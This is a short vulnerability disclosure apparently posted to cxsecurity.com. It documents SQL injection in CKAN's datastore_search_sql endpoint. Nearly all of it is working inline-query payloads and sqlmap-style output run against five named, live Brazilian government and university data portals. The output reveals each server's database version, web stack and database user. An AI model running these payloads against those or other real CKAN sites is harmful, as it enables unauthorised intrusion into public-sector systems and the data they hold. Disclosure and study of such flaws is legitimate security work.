CKAN Datastore Search - SQL-I (Brasil POC)

2021.10.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[!] https://dados.pbh.gov.br/api/3/action/datastore_search_sql?sql={PAYLOAD}
---
Parameter: sql (GET)
Type: inline query
Title: Generic inline queries
Payload: sql=(SELECT CONCAT(CONCAT('qjbvq',(CASE WHEN (2680=2680) THEN '1' ELSE '0' END)),'qpqzq'))
---
[04:56:39] [INFO] the back-end DBMS is PostgreSQL
[04:56:39] [INFO] fetching banner
[04:56:39] [INFO] resumed: 'PostgreSQL 12.7 (Debian 12.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by ...
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
banner: 'PostgreSQL 12.7 (Debian 12.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit'
[04:56:39] [INFO] fetching current user
[04:56:42] [INFO] retrieved: 'datastore_default'
current user: 'datastore_default'
[04:56:42] [INFO] fetching current database
[04:56:43] [INFO] retrieved: 'public'

[!] http://dados.mda.gov.br/api/3/action/datastore_search_sql?sql={PAYLOAD}
---
Parameter: sql (GET)
Type: inline query
Title: Generic inline queries
Payload: sql=(SELECT CONCAT(CONCAT('qkxjq',(CASE WHEN (4590=4590) THEN '1' ELSE '0' END)),'qzkzq'))
---
[04:57:09] [INFO] the back-end DBMS is PostgreSQL
[04:57:09] [INFO] fetching banner
[04:57:09] [INFO] resumed: 'PostgreSQL 9.4.13 on x86_64-suse-linux-gnu, compiled by gcc (SUSE Linux) 4.8....
web server operating system: Linux Ubuntu
web application technology: Nginx 1.4.6
back-end DBMS operating system: Linux SuSE
back-end DBMS: PostgreSQL
banner: 'PostgreSQL 9.4.13 on x86_64-suse-linux-gnu, compiled by gcc (SUSE Linux) 4.8.5, 64-bit'
[04:57:09] [INFO] fetching current user
[04:57:09] [INFO] retrieved: 'usr_ckan_datastore_r'
current user: 'usr_ckan_datastore_r'
[04:57:09] [INFO] fetching current database
[04:57:10] [INFO] retrieved: 'public'

[!] http://dados.esag.udesc.br/api/action/datastore_search_sql?sql={PAYLOAD}
---
Parameter: sql (GET)
Type: inline query
Title: Generic inline queries
Payload: sql=(SELECT CONCAT(CONCAT('qvkvq',(CASE WHEN (6630=6630) THEN '1' ELSE '0' END)),'qjxjq'))
---
[04:57:17] [INFO] the back-end DBMS is PostgreSQL
[04:57:17] [INFO] fetching banner
[04:57:17] [INFO] resumed: 'PostgreSQL 9.3.23 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-...
web server operating system: Linux Ubuntu
web application technology: Nginx 1.4.6
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: PostgreSQL
banner: 'PostgreSQL 9.3.23 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-2ubuntu1~14.04.4) 4.8.4, 64-bit'
[04:57:17] [INFO] fetching current user
[04:57:18] [INFO] retrieved: 'datastore_default'
current user: 'datastore_default'
[04:57:18] [INFO] fetching current database
[04:57:18] [INFO] retrieved: 'public'

[!] http://dados.ufop.br/api/action/datastore_search_sql?sql={PAYLOAD}
---
Parameter: sql (GET)
Type: inline query
Title: Generic inline queries
Payload: sql=(SELECT CONCAT(CONCAT('qqppq',(CASE WHEN (7157=7157) THEN '1' ELSE '0' END)),'qvqqq'))
---
[04:57:26] [INFO] the back-end DBMS is PostgreSQL
[04:57:26] [INFO] fetching banner
[04:57:27] [INFO] resumed: 'PostgreSQL 9.3.24 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-...
web server operating system: Linux Ubuntu
web application technology: Nginx 1.4.6
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: PostgreSQL
banner: 'PostgreSQL 9.3.24 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-2ubuntu1~14.04.4) 4.8.4, 64-bit'
[04:57:27] [INFO] fetching current user
[04:57:27] [INFO] retrieved: 'datastore_default'
current user: 'datastore_default'
[04:57:27] [INFO] fetching current database
[04:57:27] [INFO] retrieved: 'public'

[!] https://dados.ibict.br/api/action/datastore_search_sql?sql={PAYLOAD}
---
Parameter: sql (GET)
Type: inline query
Title: Generic inline queries
Payload: sql=(SELECT CONCAT(CONCAT('qbpkq',(CASE WHEN (3017=3017) THEN '1' ELSE '0' END)),'qqzxq'))
---
[04:57:34] [INFO] the back-end DBMS is PostgreSQL
[04:57:34] [INFO] fetching banner
[04:57:34] [INFO] resumed: 'PostgreSQL 9.4.10 on x86_64-unknown-linux-gnu, compiled by gcc (Debian 4.9.2-...
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
banner: 'PostgreSQL 9.4.10 on x86_64-unknown-linux-gnu, compiled by gcc (Debian 4.9.2-10) 4.9.2, 64-bit'
[04:57:34] [INFO] fetching current user
[04:57:35] [INFO] retrieved: 'datastore_default'
current user: 'datastore_default'
[04:57:35] [INFO] fetching current database
[04:57:37] [INFO] retrieved: 'public'



Copyright 2021, cxsecurity.com

 
